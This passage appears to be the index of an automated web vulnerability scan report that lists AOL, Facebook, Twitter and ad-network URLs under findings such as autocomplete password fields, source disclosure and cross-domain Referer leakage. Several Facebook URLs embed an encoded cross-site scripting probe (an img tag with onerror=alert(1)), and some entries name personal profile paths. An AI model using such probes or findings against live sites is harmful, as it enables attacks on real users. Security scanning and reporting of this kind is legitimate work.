17.355. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

17.356. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

17.357. http://www.moviefone.com/

17.358. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.359. http://www.pageflakes.com/subscribe.aspx

17.360. http://www.popeater.com/

17.361. http://www.tuaw.com/hub/app-reviews

18. Password field with autocomplete enabled

18.1. http://api.twitter.com/

18.2. http://api.twitter.com/

18.3. http://api.twitter.com/

18.4. http://appworld.blackberry.com/webstore/content/13833

18.5. http://appworld.blackberry.com/webstore/content/13833

18.6. http://appworld.blackberry.com/webstore/content/13833

18.7. http://appworld.blackberry.com/webstore/content/19143

18.8. http://appworld.blackberry.com/webstore/content/19143

18.9. http://appworld.blackberry.com/webstore/content/19143

18.10. http://ar-ar.facebook.com/login.php

18.11. http://digg.com/submit

18.12. https://my.screenname.aol.com/_cqr/login/login.psp

18.13. https://new.aol.com/productsweb

18.14. https://new.aol.com/productsweb/

18.15. https://new.aol.com/productsweb/

18.16. http://o.aolcdn.com/art/merge/

18.17. http://o.aolcdn.com/art/merge/

18.18. http://o.aolcdn.com/art/merge/

18.19. http://o.aolcdn.com/art/merge/

18.20. http://o.aolcdn.com/art/merge/

18.21. http://o.aolcdn.com/art/merge/

18.22. http://o.aolcdn.com/art/merge/

18.23. http://o.aolcdn.com/art/merge/

18.24. http://o.aolcdn.com/art/merge/

18.25. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

18.26. http://shortcuts.com/

18.27. http://top-sec.net/vb/

18.28. http://top-sec.net/vb/calendar.php

18.29. http://top-sec.net/vb/faq.php

18.30. http://top-sec.net/vb/forumdisplay.php

18.31. http://top-sec.net/vb/index.php

18.32. http://top-sec.net/vb/login.php

18.33. http://top-sec.net/vb/member.php

18.34. http://top-sec.net/vb/memberlist.php

18.35. http://top-sec.net/vb/online.php

18.36. http://top-sec.net/vb/online.php

18.37. http://top-sec.net/vb/profile.php

18.38. http://top-sec.net/vb/profile.php

18.39. http://top-sec.net/vb/search.php

18.40. http://top-sec.net/vb/sendmessage.php

18.41. http://top-sec.net/vb/showgroups.php

18.42. http://top-sec.net/vb/showthread.php

18.43. http://top-sec.net/vb/tags.php

18.44. http://twitter.com/

18.45. http://twitter.com/

18.46. http://twitter.com/

18.47. http://twitter.com/search

18.48. https://twitter.com/signup

18.49. https://twitter.com/signup

18.50. http://www.facebook.com/

18.51. http://www.facebook.com/

18.52. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

18.53. http://www.facebook.com/10000082482078341583

18.54. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

18.55. http://www.facebook.com/1242845259

18.56. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

18.57. http://www.facebook.com/2008/fbml

18.58. http://www.facebook.com/AOLrealestate

18.59. http://www.facebook.com/BPAmerica

18.60. http://www.facebook.com/DailyFinance

18.61. http://www.facebook.com/HockeyKen

18.62. http://www.facebook.com/KickIceForever

18.63. http://www.facebook.com/LadyBonesie

18.64. http://www.facebook.com/Loizza

18.65. http://www.facebook.com/aim

18.66. http://www.facebook.com/ajax/intl/language_dialog.php

18.67. http://www.facebook.com/aol

18.68. http://www.facebook.com/aolradio

18.69. http://www.facebook.com/burkerkink

18.70. http://www.facebook.com/careers/

18.71. http://www.facebook.com/deedee.perez1

18.72. http://www.facebook.com/directory/pages/

18.73. http://www.facebook.com/directory/people/

18.74. http://www.facebook.com/facebook

18.75. http://www.facebook.com/fayse

18.76. http://www.facebook.com/find-friends

18.77. http://www.facebook.com/gale.l.schenk

18.78. http://www.facebook.com/help/

18.79. http://www.facebook.com/izaOllie

18.80. http://www.facebook.com/jezzas

18.81. http://www.facebook.com/kimberly.christ

18.82. http://www.facebook.com/ladonna.lokey

18.83. http://www.facebook.com/lakendra.roberts

18.84. http://www.facebook.com/login.php

18.85. http://www.facebook.com/matthew.oliveira2

18.86. http://www.facebook.com/mmafighting

18.87. http://www.facebook.com/mobile/

18.88. http://www.facebook.com/pages/Barnesville/115038011847083

18.89. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

18.90. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

18.91. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

18.92. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

18.93. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

18.94. http://www.facebook.com/pages/HMFIC/149403761740008

18.95. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

18.96. http://www.facebook.com/pages/Merchandiser/123981654314779

18.97. http://www.facebook.com/pages/New-Haven-College/130105783687523

18.98. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

18.99. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

18.100. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

18.101. http://www.facebook.com/pages/Sporting-News/104068362964496

18.102. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

18.103. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

18.104. http://www.facebook.com/pages/create.php

18.105. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

18.106. http://www.facebook.com/patroyo

18.107. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

18.108. http://www.facebook.com/people/Bucky-Jordan/100000824820783

18.109. http://www.facebook.com/plugins/facepile.php

18.110. http://www.facebook.com/plugins/likebox.php

18.111. http://www.facebook.com/policy.php

18.112. http://www.facebook.com/privacy/explanation.php

18.113. http://www.facebook.com/r.php

18.114. http://www.facebook.com/r.php

18.115. http://www.facebook.com/r.php

18.116. http://www.facebook.com/r.php

18.117. http://www.facebook.com/robynalys

18.118. http://www.facebook.com/share.php

18.119. http://www.facebook.com/sharer.php

18.120. http://www.facebook.com/skdarealist

18.121. http://www.facebook.com/sportingnews

18.122. http://www.facebook.com/stefanoboscolomarchi

18.123. http://www.facebook.com/techcrunch

18.124. http://www.facebook.com/terms.php

18.125. http://www.facebook.com/theteebers

18.126. http://www.facebook.com/wmoppert

18.127. https://www.facebook.com/

18.128. https://www.facebook.com/

18.129. https://www.facebook.com/ajax/intl/language_dialog.php

18.130. https://www.facebook.com/h02332

18.131. https://www.facebook.com/help/contact.php

18.132. https://www.facebook.com/login.php

18.133. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

18.134. https://www.facebook.com/pages/create.php

18.135. https://www.facebook.com/r.php

18.136. https://www.facebook.com/r.php

18.137. https://www.facebook.com/r.php

18.138. https://www.facebook.com/recover.php

18.139. https://www.godaddy.com/

18.140. https://www.godaddy.com/domains/search.aspx

18.141. https://www.godaddy.com/gdshop/hosting/landing.asp

18.142. http://www.marketwatch.com/News/Story/Story.aspx

18.143. http://www.marketwatch.com/News/Story/Story.aspx

18.144. http://www.marketwatch.com/News/Story/Story.aspx

18.145. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

18.146. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

18.147. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

19. Source code disclosure

19.1. http://dy.snimg.com/compressed/feed-997a39b72e1a67bbf195043dabbac55e.js

19.2. https://my.screenname.aol.com/_cqr/login/login.psp

19.3. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.ttf

19.4. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.woff

19.5. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.eot

19.6. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.ttf

19.7. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.eot

19.8. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.ttf

19.9. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.woff

19.10. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.ttf

19.11. http://search.twitter.com/javascripts/search/calendar_date_select/calendar_date_select.js

19.12. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

20. ASP.NET debugging enabled

20.1. http://download.chrome.conduit-services.com/Default.aspx

20.2. http://usage.apps.conduit-services.com/Default.aspx

20.3. http://www.eyewonderlabs.com/Default.aspx

20.4. http://www.pageflakes.com/Default.aspx

21. Referer-dependent response

21.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

21.2. http://480-adver-view.c3metrics.com/v.js

21.3. http://api.screenname.aol.com/auth/getToken

21.4. http://api.twitter.com/1/statuses/show.json

21.5. http://api.twitter.com/1/statuses/user_timeline.json

21.6. http://fonts.citysbest.com/k/uni0vle-e.css

21.7. http://view.c3metrics.com/c3VTabstrct-6-2.php

21.8. http://view.c3metrics.com/v.js

21.9. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

21.10. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

21.11. http://www.facebook.com/login.php

21.12. http://www.facebook.com/plugins/activity.php

21.13. http://www.facebook.com/plugins/like.php

21.14. http://www.facebook.com/plugins/likebox.php

21.15. http://www.facebook.com/plugins/recommendations.php

21.16. http://www.facebook.com/policy.php

21.17. https://www.facebook.com/

21.18. https://www.facebook.com/h02332

21.19. https://www.facebook.com/help/contact.php

21.20. http://www.huffingtonpost.com/

21.21. http://www.tuaw.com/hub/app-reviews

22. Cross-domain POST

22.1. http://appworld.blackberry.com/webstore/content/13833

22.2. http://appworld.blackberry.com/webstore/content/19143

22.3. http://www.dailyfinance.com/

22.4. http://www.dailyfinance.com/markets/mostactives

22.5. http://www.lakewoodbeacon.org/

23. Cross-domain Referer leakage

23.1. http://a12.alphagodaddy.com/

23.2. https://account.login.aol.com/_cqr/opr/opr.psp

23.3. http://ad.doubleclick.net/adj/N2724.280341.AOL/B5372265.5

23.4. http://ad.doubleclick.net/adj/N3382.aol.comOX2222V1/B5068759.17

23.5. http://ad.doubleclick.net/adj/N3676.AOL/B5170306.41

23.6. http://ad.doubleclick.net/adj/N815.techcrunch/B5343357

23.7. http://ad.doubleclick.net/adj/huffpost.premium/front

23.8. http://ad.doubleclick.net/adj/spn.fanhouse/greg_couch

23.9. http://ad.doubleclick.net/adj/spn.home/home

23.10. http://ad.doubleclick.net/adj/spn.home/home

23.11. http://ad.doubleclick.net/adj/spn.home/home

23.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

23.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

23.14. http://addons.aol.com/welcome/index.html

23.15. http://ads.pointroll.com/PortalServe/

23.16. http://ads.pointroll.com/PortalServe/

23.17. http://ads.pointroll.com/PortalServe/

23.18. http://ads.pointroll.com/PortalServe/

23.19. http://ads.pointroll.com/PortalServe/

23.20. http://ads.pointroll.com/PortalServe/

23.21. http://ads.pointroll.com/PortalServe/

23.22. http://ads.pointroll.com/PortalServe/

23.23. http://ads.pointroll.com/PortalServe/

23.24. http://ads.pointroll.com/PortalServe/

23.25. http://ads.pointroll.com/PortalServe/

23.26. http://ads.pointroll.com/PortalServe/

23.27. http://ads.pointroll.com/PortalServe/

23.28. http://ads.pointroll.com/PortalServe/

23.29. http://ads.pointroll.com/PortalServe/

23.30. http://ads.pointroll.com/PortalServe/

23.31. http://ads.pointroll.com/PortalServe/

23.32. http://ads.pointroll.com/PortalServe/

23.33. http://ads.pointroll.com/PortalServe/

23.34. http://ads.pointroll.com/PortalServe/

23.35. http://ads.pointroll.com/PortalServe/

23.36. http://ads.pointroll.com/PortalServe/

23.37. http://ads.pointroll.com/PortalServe/

23.38. http://ads.pointroll.com/PortalServe/

23.39. http://ads.pointroll.com/PortalServe/

23.40. http://ads.pointroll.com/PortalServe/

23.41. http://ads.pointroll.com/PortalServe/

23.42. http://ads.pointroll.com/PortalServe/

23.43. http://ads.pointroll.com/PortalServe/

23.44. http://ads.pointroll.com/PortalServe/

23.45. http://ads.pointroll.com/PortalServe/

23.46. http://ads.pointroll.com/PortalServe/

23.47. http://ads.pointroll.com/PortalServe/

23.48. http://ads.pointroll.com/PortalServe/

23.49. http://ads.pointroll.com/PortalServe/

23.50. http://ads.pointroll.com/PortalServe/

23.51. http://ads.pointroll.com/PortalServe/

23.52. http://ads.pointroll.com/PortalServe/

23.53. http://ads.pointroll.com/PortalServe/

23.54. http://ads.pointroll.com/PortalServe/

23.55. http://ads.pointroll.com/PortalServe/

23.56. http://ads.pointroll.com/PortalServe/

23.57. http://ads.pointroll.com/PortalServe/

23.58. http://ads.pointroll.com/PortalServe/

23.59. http://ads.pointroll.com/PortalServe/

23.60. http://ads.pointroll.com/PortalServe/

23.61. http://ads.pointroll.com/PortalServe/

23.62. http://ads.pointroll.com/PortalServe/

23.63. http://ads.pointroll.com/PortalServe/

23.64. http://ads.pointroll.com/PortalServe/

23.65. http://ads.pointroll.com/PortalServe/

23.66. http://ads.pointroll.com/PortalServe/

23.67. http://ads.pointroll.com/PortalServe/

23.68. http://ads.pointroll.com/PortalServe/

23.69. http://ads.pointroll.com/PortalServe/

23.70. http://ads.pointroll.com/PortalServe/

23.71. http://ads.pointroll.com/PortalServe/

23.72. http://ads.pointroll.com/PortalServe/

23.73. http://ads.pointroll.com/PortalServe/

23.74. http://ads.pointroll.com/PortalServe/

23.75. http://ads.pointroll.com/PortalServe/

23.76. http://ads.pointroll.com/PortalServe/

23.77. http://ads.pointroll.com/PortalServe/

23.78. http://ads.pointroll.com/PortalServe/

23.79. http://ads.pointroll.com/PortalServe/

23.80. http://ads.pointroll.com/PortalServe/

23.81. http://ads.pointroll.com/PortalServe/

23.82. http://ads.pointroll.com/PortalServe/

23.83. http://ads.pointroll.com/PortalServe/

23.84. http://ads.pointroll.com/PortalServe/

23.85. http://ads.pointroll.com/PortalServe/

23.86. http://ads.pointroll.com/PortalServe/

23.87. http://ads.pointroll.com/PortalServe/

23.88. http://ads.pointroll.com/PortalServe/

23.89. http://ads.pointroll.com/PortalServe/

23.90. http://ads.pointroll.com/PortalServe/

23.91. http://ads.pointroll.com/PortalServe/

23.92. http://ads.pointroll.com/PortalServe/

23.93. http://ads.pointroll.com/PortalServe/

23.94. http://ads.pointroll.com/PortalServe/

23.95. http://ads.pointroll.com/PortalServe/

23.96. http://ads.pointroll.com/PortalServe/

23.97. http://ads.pointroll.com/PortalServe/

23.98. http://ads.pointroll.com/PortalServe/

23.99. http://ads.pointroll.com/PortalServe/

23.100. http://ads.pointroll.com/PortalServe/

23.101. http://ads.pointroll.com/PortalServe/

23.102. http://ads.pointroll.com/PortalServe/

23.103. http://ads.pointroll.com/PortalServe/

23.104. http://ads.pointroll.com/PortalServe/

23.105. http://ads.pointroll.com/PortalServe/

23.106. http://ads.pointroll.com/PortalServe/

23.107. http://ads.pointroll.com/PortalServe/

23.108. http://ads.pointroll.com/PortalServe/

23.109. http://ads.pointroll.com/PortalServe/

23.110. http://ads.pointroll.com/PortalServe/

23.111. http://ads.pointroll.com/PortalServe/

23.112. http://ads.pointroll.com/PortalServe/

23.113. http://ads.pointroll.com/PortalServe/

23.114. http://ads.pointroll.com/PortalServe/

23.115. http://ads.pointroll.com/PortalServe/

23.116. http://ads.pointroll.com/PortalServe/

23.117. http://ads.pointroll.com/PortalServe/

23.118. http://ads.pointroll.com/PortalServe/

23.119. http://ads.pointroll.com/PortalServe/

23.120. http://ads.pointroll.com/PortalServe/

23.121. http://ads.pointroll.com/PortalServe/

23.122. http://ads.pointroll.com/PortalServe/

23.123. http://ads.pointroll.com/PortalServe/

23.124. http://ads.pointroll.com/PortalServe/

23.125. http://ads.pointroll.com/PortalServe/

23.126. http://ads.pointroll.com/PortalServe/

23.127. http://ads.pointroll.com/PortalServe/

23.128. http://ads.pointroll.com/PortalServe/

23.129. http://ads.pointroll.com/PortalServe/

23.130. http://ads.pointroll.com/PortalServe/

23.131. http://ads.pointroll.com/PortalServe/

23.132. http://ads.pointroll.com/PortalServe/

23.133. http://ads.pointroll.com/PortalServe/

23.134. http://ads.pointroll.com/PortalServe/

23.135. http://ads.pointroll.com/PortalServe/

23.136. http://ads.pointroll.com/PortalServe/

23.137. http://ads.pointroll.com/PortalServe/

23.138. http://ads.pointroll.com/PortalServe/

23.139. http://ads.pointroll.com/PortalServe/

23.140. http://ads.pointroll.com/PortalServe/

23.141. http://ads.pointroll.com/PortalServe/

23.142. http://ads.pointroll.com/PortalServe/

23.143. http://ads.pointroll.com/PortalServe/

23.144. http://ads.pointroll.com/PortalServe/

23.145. http://ads.pointroll.com/PortalServe/

23.146. http://ads.pointroll.com/PortalServe/

23.147. http://ads.pointroll.com/PortalServe/

23.148. http://ads.pointroll.com/PortalServe/

23.149. http://ads.pointroll.com/PortalServe/

23.150. http://ads.pointroll.com/PortalServe/

23.151. http://ads.pointroll.com/PortalServe/

23.152. http://ads.pointroll.com/PortalServe/

23.153. http://ads.pointroll.com/PortalServe/

23.154. http://ads.pointroll.com/PortalServe/

23.155. http://ads.pointroll.com/PortalServe/

23.156. http://ads.pointroll.com/PortalServe/

23.157. http://ads.pointroll.com/PortalServe/

23.158. http://ads.pointroll.com/PortalServe/

23.159. http://ads.pointroll.com/PortalServe/

23.160. http://ads.pointroll.com/PortalServe/

23.161. http://ads.pointroll.com/PortalServe/

23.162. http://ads.pointroll.com/PortalServe/

23.163. http://ads.pointroll.com/PortalServe/

23.164. http://ads.pointroll.com/PortalServe/

23.165. http://ads.pointroll.com/PortalServe/

23.166. http://ads.pointroll.com/PortalServe/

23.167. http://ads.pointroll.com/PortalServe/

23.168. http://ads.pointroll.com/PortalServe/

23.169. http://ads.pointroll.com/PortalServe/

23.170. http://ads.pointroll.com/PortalServe/

23.171. http://ads.pointroll.com/PortalServe/

23.172. http://ads.pointroll.com/PortalServe/

23.173. http://ads.pointroll.com/PortalServe/

23.174. http://ads.pointroll.com/PortalServe/

23.175. http://ads.pointroll.com/PortalServe/

23.176. http://ads.pointroll.com/PortalServe/

23.177. http://ads.pointroll.com/PortalServe/

23.178. http://ads.pointroll.com/PortalServe/

23.179. http://ads.pointroll.com/PortalServe/

23.180. http://ads.pointroll.com/PortalServe/

23.181. http://ads.pointroll.com/PortalServe/

23.182. http://ads.pointroll.com/PortalServe/

23.183. http://ads.pointroll.com/PortalServe/

23.184. http://ads.pointroll.com/PortalServe/

23.185. http://ads.pointroll.com/PortalServe/

23.186. http://ads.pointroll.com/PortalServe/

23.187. http://ads.pointroll.com/PortalServe/

23.188. http://ads.pointroll.com/PortalServe/

23.189. http://ads.pointroll.com/PortalServe/

23.190. http://ads.pointroll.com/PortalServe/

23.191. http://ads.pointroll.com/PortalServe/

23.192. http://ads.pointroll.com/PortalServe/

23.193. http://ads.pointroll.com/PortalServe/

23.194. http://ads.pointroll.com/PortalServe/

23.195. http://ads.pointroll.com/PortalServe/

23.196. http://ads.pointroll.com/PortalServe/

23.197. http://ads.pointroll.com/PortalServe/

23.198. http://ads.pointroll.com/PortalServe/

23.199. http://ads.pointroll.com/PortalServe/

23.200. http://ads.pointroll.com/PortalServe/

23.201. http://ads.pointroll.com/PortalServe/

23.202. http://ads.pointroll.com/PortalServe/

23.203. http://ads.pointroll.com/PortalServe/

23.204. http://ads.pointroll.com/PortalServe/

23.205. http://ads.pointroll.com/PortalServe/

23.206. http://ads.pointroll.com/PortalServe/

23.207. http://ads.pointroll.com/PortalServe/

23.208. http://ads.pointroll.com/PortalServe/

23.209. http://ads.pointroll.com/PortalServe/

23.210. http://ads.pointroll.com/PortalServe/

23.211. http://ads.pointroll.com/PortalServe/

23.212. http://ads.pointroll.com/PortalServe/

23.213. http://ads.pointroll.com/PortalServe/

23.214. http://ads.pointroll.com/PortalServe/

23.215. http://ads.pointroll.com/PortalServe/

23.216. http://ads.pointroll.com/PortalServe/

23.217. http://ads.pointroll.com/PortalServe/

23.218. http://ads.pointroll.com/PortalServe/

23.219. http://ads.pointroll.com/PortalServe/

23.220. http://ads.pointroll.com/PortalServe/

23.221. http://ads.pointroll.com/PortalServe/

23.222. http://ads.pointroll.com/PortalServe/

23.223. http://ads.pointroll.com/PortalServe/

23.224. http://ads.pointroll.com/PortalServe/

23.225. http://ads.pointroll.com/PortalServe/

23.226. http://ads.pointroll.com/PortalServe/

23.227. http://ads.pointroll.com/PortalServe/

23.228. http://ads.pointroll.com/PortalServe/

23.229. http://ads.pointroll.com/PortalServe/

23.230. http://ads.pointroll.com/PortalServe/

23.231. http://ads.pointroll.com/PortalServe/

23.232. http://ads.pointroll.com/PortalServe/

23.233. http://ads.pointroll.com/PortalServe/

23.234. http://ads.pointroll.com/PortalServe/

23.235. http://ads.pointroll.com/PortalServe/

23.236. http://ads.pointroll.com/PortalServe/

23.237. http://ads.pointroll.com/PortalServe/

23.238. http://ads.pointroll.com/PortalServe/

23.239. http://ads.pointroll.com/PortalServe/

23.240. http://ads.pointroll.com/PortalServe/

23.241. http://ads.pointroll.com/PortalServe/

23.242. http://ads.pointroll.com/PortalServe/

23.243. http://ads.pointroll.com/PortalServe/

23.244. http://ads.pointroll.com/PortalServe/

23.245. http://ads.pointroll.com/PortalServe/

23.246. http://ads.pointroll.com/PortalServe/

23.247. http://ads.pointroll.com/PortalServe/

23.248. http://ads.pointroll.com/PortalServe/

23.249. http://ads.pointroll.com/PortalServe/

23.250. http://ads.pointroll.com/PortalServe/

23.251. http://ads.pointroll.com/PortalServe/

23.252. http://ads.pointroll.com/PortalServe/

23.253. http://ads.pointroll.com/PortalServe/

23.254. http://ads.pointroll.com/PortalServe/

23.255. http://ads.pointroll.com/PortalServe/

23.256. http://ads.tw.adsonar.com/adserving/getAds.jsp

23.257. http://ads.tw.adsonar.com/adserving/getAds.jsp

23.258. http://ads.undertone.com/afr.php

23.259. http://ads.undertone.com/afr.php

23.260. http://ads.undertone.com/afr.php

23.261. http://ads.undertone.com/afr.php

23.262. http://ads.undertone.com/afr.php

23.263. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

23.264. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

23.265. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

23.266. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

23.267. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

23.268. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

23.269. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

23.270. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

23.271. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php

23.272. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php

23.273. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

23.274. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

23.275. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php

23.276. http://apartments.rentedspaces.oodle.com/

23.277. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP

23.278. http://apps.conduit.com/TechCrunch_App-Techcrunch_News

23.279. http://ar-ar.facebook.com/login.php

23.280. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=120x60

23.281. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.282. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.283. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.284. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.285. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.286. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.287. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.288. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.289. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.290. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.291. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

23.292. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=230x10

23.293. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250

23.294. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

23.295. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

23.296. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=728x90

23.297. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=728x90

23.298. http://b.aol.com/master/

23.299. http://b.aol.com/master/

23.300. http://b.aol.com/master/

23.301. http://b.dailyfinance.com/vanity/

23.302. http://b.games.com/vanity/

23.303. http://b.huffingtonpost.com/vanity/

23.304. http://b.mmafighting.com/vanity/

23.305. http://b.tuaw.com/vanity/

23.306. http://choices.truste.com/ca

23.307. http://cm.g.doubleclick.net/pixel

23.308. http://d.tradex.openx.com/afr.php

23.309. http://fls.doubleclick.net/activityi

23.310. http://help.aol.com/help/microsites/microsite.do

23.311. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

23.312. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

23.313. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.314. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.315. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.316. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.317. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.318. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.319. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.320. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

23.321. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewEula

23.322. http://itunes.apple.com/us/app/engadget/id347839246

23.323. http://itunes.apple.com/us/genre/ios-news/id6009

23.324. http://lifestream.aol.com/

23.325. http://mobile.aol.com/

23.326. http://my.screenname.aol.com/_cqr/logout/mcLogout.psp

23.327. https://my.screenname.aol.com/_cqr/login/login.psp

23.328. https://my.screenname.aol.com/_cqr/login/login.psp

23.329. https://my.screenname.aol.com/_cqr/login/login.psp

23.330. https://my.screenname.aol.com/_cqr/login/login.psp

23.331. https://my.screenname.aol.com/_cqr/login/login.psp

23.332. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

23.333. https://my.screenname.aol.com/badbrowser.psp

23.334. https://new.aol.com/productsweb/

23.335. http://o.aolcdn.com/art/merge/

23.336. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js

23.337. http://o.aolcdn.com/os_merge/

23.338. http://o.aolcdn.com/os_merge/

23.339. http://realestate.aol.com/

23.340. http://realestate.aol.com/modules/common2/main_mortrate_data.jsp

23.341. http://s.huffpost.com/assets/js.php

23.342. http://s.huffpost.com/assets/js.php

23.343. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js

23.344. http://search.aol.com/aol/search

23.345. http://search.aol.com/aol/search

23.346. http://search.twitter.com/search

23.347. http://search.twitter.com/search

23.348. http://search.twitter.com/search.atom

23.349. http://techcrunch.com/

23.350. http://techcrunch.com/

23.351. http://techcrunch.com/

23.352. http://techcrunch.com/

23.353. http://techcrunch.com/

23.354. http://top-sec.net/vb/login.php

23.355. http://top-sec.net/vb/member.php

23.356. http://twitter.com/

23.357. https://twitter.com/signup

23.358. http://webcache.googleusercontent.com/search

23.359. http://www.aol.com/ajax.jsp

23.360. http://www.aol.com/ajax.jsp

23.361. http://www.aol.com/ajax.jsp

23.362. http://www.aol.com/ajax.jsp

23.363. http://www.aol.com/ajax.jsp

23.364. http://www.aol.com/ajax.jsp

23.365. http://www.aol.com/ajax.jsp

23.366. http://www.aol.com/ajax.jsp

23.367. http://www.aol.com/ajax.jsp

23.368. http://www.aol.com/ajax.jsp

23.369. http://www.aol.com/ajax.jsp

23.370. http://www.aol.com/ajax.jsp

23.371. http://www.aol.com/ajax.jsp

23.372. http://www.aol.com/ajax.jsp

23.373. http://www.aol.com/ajax.jsp

23.374. http://www.aol.com/ajax.jsp

23.375. http://www.aol.com/ajax.jsp

23.376. http://www.aol.com/ajax.jsp

